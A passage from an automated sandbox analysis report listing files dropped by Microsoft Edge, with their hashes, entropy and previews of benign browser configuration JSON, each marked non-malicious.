MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\9cab5f35-295f-42a8-8650-639e6976941f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF27e2f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF28860.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a49646d6-3a03-4bc4-86d9-c6ab47ccfb0d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\acf1babc-6e25-4a1e-88c6-6587366c26eb.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d52f8d7f-3cf6-433e-9c1c-bb26bfe32319.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e9ea6c07-6336-4b49-8e0f-07e78c5d3246.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.5710414639592765
Encrypted:	false
SSDEEP:	768:9xdWqUWPnjfRI8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWJ5KYrwVWingpqtun:9xdWqUWPnjfRIu1ja1zKJA6tg
MD5:	F5068A11B9AC4843936CEC8F14815101
SHA1:	4D415CC136C034E1CAED16C7B20C72DF252F2515
SHA-256:	268330CA26E2321B20BA5411CC50DDA98DEC803B4C305D216DD848F7E81B132A
SHA-512:	DBF4B7009C5998EB45DF6AAE37414FB16E1D6FA65FCA87C5A699E71CD2C00AA0E148E469BBDAF564EC72DFE0049C5931799A8887738156F58B76CCA106F2C9F6
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13370090291242821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13370090291242821","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fb4cdc1a-911e-4cc7-bc8c-9080a7b45360.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	10186
Entropy (8bit):	5.208640454317187
Encrypted:	false
SSDEEP:	192:stmkdusl+eyaNPcLHREkGw3s80bV+FE8QAnTIP9YJ:stmtsIetJcsbG7Qa
MD5:	AB3104C5D75C4DE7DC35DE53EFA9BDEE
SHA1:	57D64D1F83ED116703A28DFF0E70EF7688BE6310
SHA-256:	C8EE63121F97B82C58B99C284F1883DBD299253B97EAC0A833B576ABC79A9470
SHA-512:	FEA9B6DEC041C0D7C836CA39AE00D90F1D639746565408A5C9B030412A177C9A8818DCC38D9652DD6966251BEF6267A41903840058FED5659AAADF38809D5D97
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13370090291882678","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030470432651285
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynqPGWv/sxtwQ7VLyMV/YoskFoz:z/0+zI7ynuv/4KCVeZoskG
MD5:	8446890EF3835BC923B91CBFBA250C48
SHA1:	C22FA824717B8DB08E666EC52B8D8072E4502579
SHA-256:	024FC9D7969A2F818D4BB6ADB0D27B1A9C29EB287040967B3339B5DAB8767EAE
SHA-512:	111E3B25E887BE2D8261A3206C8A014B78CE9958170935DC952B3B1CD860C58E381EFDCA69410F5C284472B38C70D0DF35DD8083B8A7A4637199E534DC3A8A0E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24bc4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030470432651285
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynqPGWv/sxtwQ7VLyMV/YoskFoz:z/0+zI7ynuv/4KCVeZoskG
MD5:	8446890EF3835BC923B91CBFBA250C48
SHA1:	C22FA824717B8DB08E666EC52B8D8072E4502579
SHA-256:	024FC9D7969A2F818D4BB6ADB0D27B1A9C29EB287040967B3339B5DAB8767EAE
SHA-512:	111E3B25E887BE2D8261A3206C8A014B78CE9958170935DC952B3B1CD860C58E381EFDCA69410F5C284472B38C70D0DF35DD8083B8A7A4637199E534DC3A8A0E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24c03.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030470432651285
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynqPGWv/sxtwQ7VLyMV/YoskFoz:z/0+zI7ynuv/4KCVeZoskG
MD5:	8446890EF3835BC923B91CBFBA250C48
SHA1:	C22FA824717B8DB08E666EC52B8D8072E4502579
SHA-256:	024FC9D7969A2F818D4BB6ADB0D27B1A9C29EB287040967B3339B5DAB8767EAE
SHA-512:	111E3B25E887BE2D8261A3206C8A014B78CE9958170935DC952B3B1CD860C58E381EFDCA69410F5C284472B38C70D0DF35DD8083B8A7A4637199E534DC3A8A0E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF24f5e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030470432651285
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynqPGWv/sxtwQ7VLyMV/YoskFoz:z/0+zI7ynuv/4KCVeZoskG
MD5:	8446890EF3835BC923B91CBFBA250C48
SHA1:	C22FA824717B8DB08E666EC52B8D8072E4502579
SHA-256:	024FC9D7969A2F818D4BB6ADB0D27B1A9C29EB287040967B3339B5DAB8767EAE
SHA-512:	111E3B25E887BE2D8261A3206C8A014B78CE9958170935DC952B3B1CD860C58E381EFDCA69410F5C284472B38C70D0DF35DD8083B8A7A4637199E534DC3A8A0E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2766e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030470432651285
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynqPGWv/sxtwQ7VLyMV/YoskFoz:z/0+zI7ynuv/4KCVeZoskG
MD5:	8446890EF3835BC923B91CBFBA250C48
SHA1:	C22FA824717B8DB08E666EC52B8D8072E4502579
SHA-256:	024FC9D7969A2F818D4BB6ADB0D27B1A9C29EB287040967B3339B5DAB8767EAE
SHA-512:	111E3B25E887BE2D8261A3206C8A014B78CE9958170935DC952B3B1CD860C58E381EFDCA69410F5C284472B38C70D0DF35DD8083B8A7A4637199E534DC3A8A0E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF29f63.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.1030470432651285
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7ynqPGWv/sxtwQ7VLyMV/YoskFoz:z/0+zI7ynuv/4KCVeZoskG
MD5:	8446890EF3835BC923B91CBFBA250C48
SHA1:	C22FA824717B8DB08E666EC52B8D8072E4502579
SHA-256:	024FC9D7969A2F818D4BB6ADB0D27B1A9C29EB287040967B3339B5DAB8767EAE
SHA-512:	111E3B25E887BE2D8261A3206C8A014B78CE9958170935DC952B3B1CD860C58E381EFDCA69410F5C284472B38C70D0DF35DD8083B8A7A4637199E534DC3A8A0E
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eK